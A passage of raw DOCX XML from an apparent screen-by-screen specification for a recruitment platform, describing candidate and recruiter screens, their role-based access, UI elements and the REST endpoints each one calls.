        <w:t>Instant demo account pills (Candidate, Recruiter, Admin), Username/Email input, Password input with visibility toggle, Sign In submit button.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Network &amp; API Integration: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>POST /api/auth/login -&gt; returns JWT Bearer token, stored in browser localStorage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Screen 5: Candidate Personal Career Cockpit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="2584691"/>
            <wp:docPr id="5" name="Picture 5"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="media_1789006509350.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2584691"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure: Screen 5: Candidate Personal Career Cockpit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Screen Purpose: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Central command dashboard for job seekers tracking active applications, scheduled interviews, and profile strength.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Access Control &amp; Security: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Candidate (ROLE_CANDIDATE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interactive UI Elements: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>KPI cards: Active Applications (2), Interviews Scheduled (1), Offers Extended (1), Profile Strength (90%), Active Applications list with interview badges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Network &amp; API Integration: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>GET /api/applications/my-applications, GET /api/profiles/me -&gt; renders real-time candidate status.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Screen 6: Candidate Application Tracker &amp; Pipeline Stepper</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="2584691"/>
            <wp:docPr id="6" name="Picture 6"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="media_1789006535291.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2584691"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure: Screen 6: Candidate Application Tracker &amp; Pipeline Stepper</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Screen Purpose: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Interactive progress tracker displaying 6-stage visual pipeline stepper and technical interview details.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Access Control &amp; Security: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Candidate (ROLE_CANDIDATE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interactive UI Elements: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>6-stage stepper: APPLIED (checked) -&gt; SCREENING (checked) -&gt; SHORTLISTED (checked) -&gt; INTERVIEW (active) -&gt; OFFER -&gt; HIRED; Join Google Meet blue button, Withdraw application link.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Network &amp; API Integration: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>GET /api/applications/my-applications, POST /api/applications/{id}/withdraw.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Screen 7: Candidate Professional Profile &amp; Resume Center</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="2584691"/>
            <wp:docPr id="7" name="Picture 7"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="media_1789006559252.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2584691"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure: Screen 7: Candidate Professional Profile &amp; Resume Center</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Screen Purpose: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Candidate professional identity management center for bio, experience, expected salary, and resume upload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Access Control &amp; Security: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Candidate (ROLE_CANDIDATE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interactive UI Elements: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Avatar card, Full Name headline, Edit Profile CTA, Upload Resume button, Professional Summary card, Profile Completeness (100%) progress bar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Network &amp; API Integration: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>GET /api/profiles/me, PUT /api/profiles/me -&gt; updates candidate metadata in database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Screen 8: Candidate Verified Skills &amp; Tag Manager</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="2584691"/>
            <wp:docPr id="8" name="Picture 8"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="media_1789006567429.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2584691"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure: Screen 8: Candidate Verified Skills &amp; Tag Manager</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Screen Purpose: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Interactive technical skill inventory where candidates manage verified competencies used by the match engine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Access Control &amp; Security: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Candidate (ROLE_CANDIDATE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interactive UI Elements: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Add skill text input, (+) add button, interactive skill pills with (x) delete tags (Java, Spring Boot, System Design, Testing, SQL, REST API), Suggested skill pills, Sync &amp; Save button.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Network &amp; API Integration: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>PUT /api/profiles/me with updated skills array -&gt; syncs with profile_skills join table.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Screen 9: Recruiter Talent Hiring Hub Command Center</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="2584691"/>
            <wp:docPr id="9" name="Picture 9"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="media_1789006622170.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2584691"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure: Screen 9: Recruiter Talent Hiring Hub Command Center</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Screen Purpose: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Enterprise recruiter cockpit providing operational overview of requisitions, talent pipeline, and scheduled interviews.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Access Control &amp; Security: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Recruiter (ROLE_RECRUITER)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interactive UI Elements: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>KPI metrics: Active Openings (3), Total Candidates (24), Shortlisted (1), Interviews Scheduled (4); Post Opportunity CTA button, Requisitions tab, Sourcing tab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Network &amp; API Integration: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>GET /api/recruiter/my-jobs, GET /api/analytics/recruiter -&gt; computes hiring pipeline conversion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Screen 10: Recruiter Active Requisitions &amp; Scheduled Interviews</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="2584691"/>
            <wp:docPr id="10" name="Picture 10"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="media_1789006631073.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2584691"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure: Screen 10: Recruiter Active Requisitions &amp; Scheduled Interviews</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Screen Purpose: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Detailed table of active job requisitions and upcoming interview schedule widget with candidate details.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Access Control &amp; Security: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Recruiter (ROLE_RECRUITER)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interactive UI Elements: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Requisitions table (Title, Work Mode, Status badge: PUBLISHED, ATS Pipeline link), Upcoming Interviews list (Riya Sharma - Tomorrow 10:30 AM), Matching Engine Precision card (94%).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Network &amp; API Integration: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>GET /api/recruiter/my-jobs, GET /api/interviews/upcoming.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Screen 11: Recruiter ATS Pipeline &amp; Candidate Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="2584691"/>
            <wp:docPr id="11" name="Picture 11"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="media_1789006648526.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2584691"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure: Screen 11: Recruiter ATS Pipeline &amp; Candidate Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Screen Purpose: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Kanban-style candidate pipeline for a specific job requisition allowing stage advancement and offer generation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Access Control &amp; Security: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Recruiter (ROLE_RECRUITER)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interactive UI Elements: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Export Candidates (CSV) button, Pipeline stage filter pills (All, Applied, Screening, Shortlisted, Interview Scheduled, Selected, Offer Sent, Rejected), Candidate card (samir.react, 95% Match, notes), Inspect Profile button, Stage dropdown, Interview button, Send Offer CTA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Network &amp; API Integration: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>GET /api/recruiter/jobs/{id}/applicants, PUT /api/recruiter/applications/{id}/status, GET /api/recruiter/jobs/{id}/export-applicants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
